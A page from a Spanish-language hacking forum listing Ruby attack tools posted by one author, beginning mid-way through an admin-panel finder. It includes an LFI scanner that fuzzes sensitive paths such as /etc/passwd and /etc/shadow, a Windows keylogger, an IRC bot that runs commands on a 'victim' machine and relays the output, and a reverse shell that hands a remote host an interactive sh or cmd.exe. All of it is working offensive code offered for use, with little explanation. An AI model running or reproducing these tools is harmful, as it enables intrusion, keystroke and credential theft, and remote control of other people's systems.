    24.   code = toma(URI.parse(web+"/"+panel))
    25.   rescue
    26.   copyright()
    27.   end
    28.   case code
    29.   when Net::HTTPSuccess
    30.   print "[Link] : "+web+"/"+panel+"\n"
    31. end
    32. end
    33. end
    34. end
    35.  
    36. def head()
    37.   print "\n\n -- == Panel Control == --\n\n"
    38. end
    39.  
    40. def copyright()
    41.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    42.    exit(1)
    43.  end
    44.  
    45. head()
    46. if !ARGV[0]
    47.   uso()
    48. else
    49.   scan(ARGV[0],panels)  
    50. end
    51. copyright()
    52.  
    53.  

    390
    Ruby / [Ruby] LFI T00l
    « en: Julio 03, 2011, 09:32:22 pm »
    Un scanner de LFI

    Código: Ruby
    1. #!usr/bin/ruby
    2. #LFI tool (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7.  
    8. def uso
    9.   print "\n<ul class="bbc_list"><li type="square"> lfi.rb <site>\n"[/li][/list]
    10. end
    11.  
    12. def toma(host,path)
    13.   http = Net::HTTP.new(host,80)
    14.   return http.get(path).body
    15. end
    16.  
    17. def fuzz(web)
    18. files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
    19.  files.each do |file|
    20. begin
    21.  url = URI.parse(web)
    22.  code = toma(url.host,url.path+"?"+url.query+file)
    23.  if not code=~/No such file or directory in/
    24.    print "[Link] : "+web+file+"\n"
    25.  end
    26.  end
    27. end
    28. end
    29.  
    30.  
    31. def scan(web)
    32.   print "\n</li><li type="square"> Testing the vulnerability LFI...\n\n"[/li][/list]
    33.   begin
    34.   url = URI.parse(web)
    35.   code = toma(url.host,url.path+"?"+url.query+"'")
    36.   if code=~/No such file or directory in/
    37.    saca = code.split("No such file or directory in <b>")
    38.    saca = saca[1].split("<\/b> on line")
    39.    print "</li><li type="square"> LFI Detected\n\n"[/li][/list]
    40.    print "[Full Path Discloure]: "+saca[0]+"\n"
    41.    print "\n\n</li><li type="square"> Fuzzing Files\n\n"[/li][/list]
    42.    fuzz(web)
    43.    print "\n</li><li type="square"> Finish\n"[/li][/list]
    44.   copyright()
    45.   else
    46.     print "[-] Not Vulnerable to LFI\n\n"
    47. end
    48. end
    49. end
    50.  
    51. def head()
    52.   print "\n\n -- == LFI tOOL == --\n\n"
    53. end
    54.  
    55. def copyright()
    56.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    57.    exit(1)
    58.  end
    59.  
    60. head()
    61. if !ARGV[0]
    62.   uso()
    63. else
    64.   scan(ARGV[0])  
    65. end
    66. copyright()
    67.  

    391
    Ruby / [Ruby] Simple Keylogger
    « en: Julio 03, 2011, 09:32:00 pm »
    Un simple keylogger en Ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Simple Keylogger in Ruby
    3. #(C) Doddy Hackman 2011
    4.  
    5. require 'Win32API'
    6.  
    7. def savefile(filename,text)
    8. files = File.open(filename,'a')
    9. files.puts text+"\n"
    10. end
    11.  
    12. def capturar
    13.  
    14. nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")
    15.  
    16. while 1
    17.  
    18. for num1 in (0x30..0x39) #numbers
    19. if nave.call(num1) & 0x01 == 1
    20. savefile("logs.txt",num1.chr())
    21. end
    22. end
    23.  
    24. for num2 in (0x41..0x5A) #letters
    25. if nave.call(num2) & 0x01 == 1
    26. savefile("logs.txt",num2.chr())
    27. end
    28. end
    29. end  
    30. end
    31.  
    32. capturar() #Start the keylogger
    33.  
    34. # ¿ The End ?
    35.  

    392
    Ruby / [Ruby] IRC Bot
    « en: Julio 03, 2011, 09:31:41 pm »
    Hola a todos

    Acabo de hacer un simple bot para IRC , el bot se
    conecta en la maquina ejecutante (victima) con un nombre
    marcado por ustedes , entonces con solo poner

    cmdnow :TU COMANDO:

    Recibiran en el mismo chat un mensaje con el resultado del comando puesto

    El codigo es el siguiente

    Código: Ruby
    1. #!usr/bin/ruby
    2. #IRC Bot (C) Doddy Hackman 2011
    3.  
    4. host = "localhost"
    5. canal = "#locos"
    6. botname = "aa"
    7.  
    8. def head()
    9. print "\n\n == -- IRC BOT -- ==\n\n"
    10. end
    11.  
    12. def uso()
    13. print "\n<ul class="bbc_list"><li type="square"> Sintax : #{$0} <host> <channel> <bot name>\n"[/li][/list]
    14. end
    15.  
    16. def copyright()
    17. print "\n\n(C) Doddy Hackman 2011\n\n"
    18. end
    19.  
    20. def load(host,canal,botname)
    21. begin
    22. irc = TCPSocket.open(host,6667)
    23. rescue
    24. print "\n\n[-] Error\n\n"
    25. else
    26. irc.print "NICK #{botname}\r\n"
    27. irc.print "USER #{botname} 1 1 1 1\r\n"
    28. irc.print "JOIN #{canal}\r\n"
    29.  
    30. print "\n\n</li><li type="square"> Online\n\n"[/li][/list]
    31.  
    32. while 1
    33.  
    34. code = irc.recv(666)  
    35.  
    36. if (code=~/PING (.*)/)
    37. irc.print "PONG #{$1}\n"
    38. end
    39.  
    40. #if code=~/:(.*)!(.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*)/
    41. #print "Un tal : #{$1}\n"
    42. #print "Dijo : #{$3}\n"
    43. #end
    44.  
    45. if code=~/cmdnow <img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*):/
    46. re = IO.popen($1).read
    47. re = re.gsub("\n","|")
    48. irc.print "PRIVMSG #locos : ",re,"\r\n"  
    49. end
    50. end
    51. end
    52. end
    53.  
    54. head()
    55. load(host,canal,botname)
    56. copyright()
    57.  
    58.  
    59. # ¿ The End ?
    60.  

    393
    Ruby / [Ruby] BackShell
    « en: Julio 03, 2011, 09:31:27 pm »
    Un reverse shell en ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Back Shell (C) Doddy HAckman 2010
    3. #Creditos : protos por darle vida a un lenguaje casi olvidado  en este mundo
    4.  
    5. require 'socket'
    6.  
    7. ip = ARGV[0]
    8. port = ARGV[1]
    9.  
    10. def uso
    11.   print "\n<ul class="bbc_list"><li type="square"> bind.rb <ip> <port>\n"[/li][/list]
    12. end
    13.  
    14. def  head
    15.   print "\n\n-- == ReverseShell By Doddy H == --\n\n"
    16. end
    17.  
    18. def copyright
    19.   print "\n\n(C) Doddy Hackman 2010\n\n"
    20. end
    21.  
    22.  
    23. def infowin
    24.   system("net user")
    25. end
    26.  
    27. def openwin()
    28.  system("cmd.exe")
    29.  end  
    30.  
    31.  def infolin
    32.   system("uname -a")
    33. end
    34.  
    35. def openlin()
    36.  system("export TERM=xterm;exec sh -i")
    37.  end  
    38.  
    39. def now(ip,port)
    40.   print "\n\n-- == ReverseShell By Doddy H == --\n\n"
    41.   print "\n</li><li type="square"> Ok , enter to the system\n\n"[/li][/list]
    42.  begin
    43.  backdoor = TCPSocket.new(ip,port)
    44.   $stdout.reopen(backdoor)
    45.   $stdin.reopen(backdoor)
    46.   rescue
    47.   print "\n[-] Un puto error !!\n\n"
    48.   exit(1)  
    49.   end
    50.   if RUBY_PLATFORM =~/win/
    51.    infowin()
    52.    openwin()
    53.   else
    54.    infolin()
    55.    openlin()
    56. end
    57. end
    58.  
    59.  
    60. if !ip and !port
    61.  uso()
    62. else
    63.   now(ip,port)
    64. end
    65.  
    66. #The End <img src="https://underc0de.org/foro/Smileys/default/huh.gif" alt="???" title="Huh" class="smiley" />
    67.  

    Páginas: 1 ... 18 19 [20]